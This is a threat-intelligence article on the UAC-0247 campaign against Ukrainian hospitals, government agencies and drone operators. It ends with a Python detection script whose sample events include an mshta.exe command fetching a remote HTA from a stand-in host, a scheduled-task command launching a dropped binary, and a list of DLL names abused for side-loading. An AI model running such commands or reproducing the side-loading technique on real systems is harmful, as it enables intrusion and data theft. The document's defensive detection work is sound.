UAC-0247 Attacks Hospitals, Governments to Steal Browser, WhatsApp Data
Key Takeaways
- The threat group UAC-0247 has been observed since early 2026, targeting government entities and hospitals, as well as Ukrainian defense personnel.
- The attackers employ sophisticated spear-phishing tactics, often leveraging themes of humanitarian aid or software updates, to deliver malware.
- The primary objective is the exfiltration of sensitive data from web browsers and WhatsApp, alongside extensive network reconnaissance.
- A key component of their arsenal is the AGINGFLY remote access trojan, which dynamically compiles command handlers on infected systems.
UAC-0247 Targets Critical Sectors with Advanced Data Theft Campaign
A persistent threat cluster tracked as UAC-0247 has been engaged in cyber espionage since early 2026, according to CERT-UA's reporting. The group has systematically targeted government agencies and hospitals, with a focus on stealing sensitive data from web browsers and WhatsApp. Beyond data exfiltration, UAC-0247 performs network reconnaissance and lateral movement inside compromised environments.
Initial Infiltration Tactics
The campaign typically begins with a spear-phishing email themed around humanitarian aid that urges the recipient to click a link. To make the link look trustworthy, the attackers either build convincing fake websites with AI tools or abuse Cross-Site Scripting (XSS) flaws on legitimate third-party sites so that the link points at a trusted domain. The link delivers an archive to the victim's system. Inside the archive is a shortcut (LNK) file; opening it invokes the built-in HTA host, mshta.exe, to fetch and execute a remote HTA file. The HTA usually displays a decoy form to occupy the user while, in the background, an executable is dropped to disk and launched through a newly created scheduled task.
Analysts at CERT-UA have documented this activity in detail, noting a surge in attacks during March and April 2026. The same group has also broadened its targeting to include Ukrainian Defense Forces personnel and FPV drone operators. In a notable incident on March 10, 2026, an archive named “bachu.zip” was distributed via the Signal messenger, posing as an update for the “BACHU” software used by FPV operators. The archive contained a DLL placed beside the legitimate program so that, when the program started, it loaded the malicious DLL instead of the expected system library (DLL side-loading) and launched the AGINGFLY malware. Further detail is available in CERT-UA's published report.
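The two delivery chains above (LNK to mshta.exe to remote HTA to scheduled task, and a DLL side-loaded beside a trusted program) each leave a small set of host telemetry events that a detection engineer can key on. The following is an added example, not code from CERT-UA or HackersRadar: three toy rules run over constructed, Sysmon-style process-creation and image-load records. Every host name, path, task name and DLL file name in the sample events is hypothetical; the page does not say which DLL was used in bachu.zip, so `version.dll` here stands in for any commonly side-loaded system DLL.

```python
"""Toy detections for the UAC-0247 delivery chains described above.

The EVENTS list is constructed sample telemetry (Sysmon-like fields), not data
from the CERT-UA report. Paths, names and the URL are hypothetical.
"""
import re
from pathlib import PureWindowsPath

# Constructed events: one benign baseline plus the two delivery chains.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\explorer.exe", "parent": "",
     "cmdline": "explorer.exe"},
    # Stage 1: LNK launches the HTA host with a remote URL (hypothetical URL).
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe https://aid-form.example.invalid/form.hta"},
    # Stage 2: the HTA registers a scheduled task pointing at a dropped binary.
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'schtasks /create /tn Updater /tr "C:\Users\u\AppData\Roaming\svc.exe" /sc minute /mo 5'},
    # Side-loading: a system DLL name loaded from the program's own folder
    # (DLL name is hypothetical; the page does not name it).
    {"type": "imageload", "image": r"C:\Users\u\Downloads\bachu\bachu.exe",
     "loaded": r"C:\Users\u\Downloads\bachu\version.dll", "signed": False},
    # Benign: local HTA and the genuine System32 DLL should not fire.
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\Program Files\App\help.hta"},
    {"type": "imageload", "image": r"C:\Program Files\App\app.exe",
     "loaded": r"C:\Windows\System32\version.dll", "signed": True},
]

# Directories an unprivileged user can write to; a task that runs a binary
# from here is far more suspicious than one pointing into Program Files.
USER_WRITABLE = re.compile(
    r"^(?:[a-z]:\\users\\[^\\]+\\(?:appdata|downloads|desktop|documents)"
    r"|[a-z]:\\programdata|[a-z]:\\users\\public|[a-z]:\\windows\\temp)\\",
    re.IGNORECASE,
)
# http(s) URL or UNC path handed to mshta.exe: the HTA comes from off-host.
REMOTE_SOURCE = re.compile(r"(?:https?://|\\\\[^\\\s]+\\)", re.IGNORECASE)
SYSTEM_DIRS = re.compile(r"^[a-z]:\\windows\\(?:system32|syswow64)\\", re.IGNORECASE)
# DLL names many programs import by name and that are therefore popular
# side-loading targets when a copy is planted next to the EXE.
SIDELOAD_NAMES = {"version.dll", "dbghelp.dll", "cryptbase.dll",
                  "wininet.dll", "userenv.dll", "profapi.dll"}


def base(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def rule_mshta_remote(ev: dict) -> bool:
    """mshta.exe executing an HTA fetched from a URL or UNC share."""
    return (ev["type"] == "process" and base(ev["image"]) == "mshta.exe"
            and bool(REMOTE_SOURCE.search(ev["cmdline"])))


def rule_schtasks_user_writable(ev: dict) -> bool:
    """schtasks /create whose /tr target lives in a user-writable directory."""
    if ev["type"] != "process" or base(ev["image"]) != "schtasks.exe":
        return False
    cmd = ev["cmdline"]
    if not re.search(r"/create\b", cmd, re.IGNORECASE):
        return False
    m = re.search(r'/tr\s+"?([^"]+?)"?(?:\s+/|$)', cmd, re.IGNORECASE)
    return bool(m and USER_WRITABLE.search(m.group(1).strip()))


def rule_dll_sideload(ev: dict) -> bool:
    """A well-known system DLL name loaded from outside System32, either from
    the process's own directory or without a valid signature."""
    if ev["type"] != "imageload":
        return False
    dll = ev["loaded"]
    if base(dll) not in SIDELOAD_NAMES or SYSTEM_DIRS.search(dll):
        return False
    same_dir = PureWindowsPath(dll).parent == PureWindowsPath(ev["image"]).parent
    return same_dir or not ev.get("signed", False)


RULES = {
    "mshta_remote": rule_mshta_remote,
    "schtasks_user_writable": rule_schtasks_user_writable,
    "dll_sideload": rule_dll_sideload,
}


def detect(events: list) -> list:
    """Return (event_index, rule_name) pairs for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events)
            for name, fn in RULES.items() if fn(ev)]


if __name__ == "__main__":
    for idx, name in detect(EVENTS):
        print(f"event {idx}: {name}: {EVENTS[idx]}")
```

The rules are deliberately narrow: the mshta rule fires only on remote sources, so locally installed help HTAs stay quiet, and the side-loading rule requires both a known-abused DLL name and a non-System32 location. In production these would be tuned against the environment's own baseline of HTA use and of software that legitimately ships its own copies of these DLLs.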
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.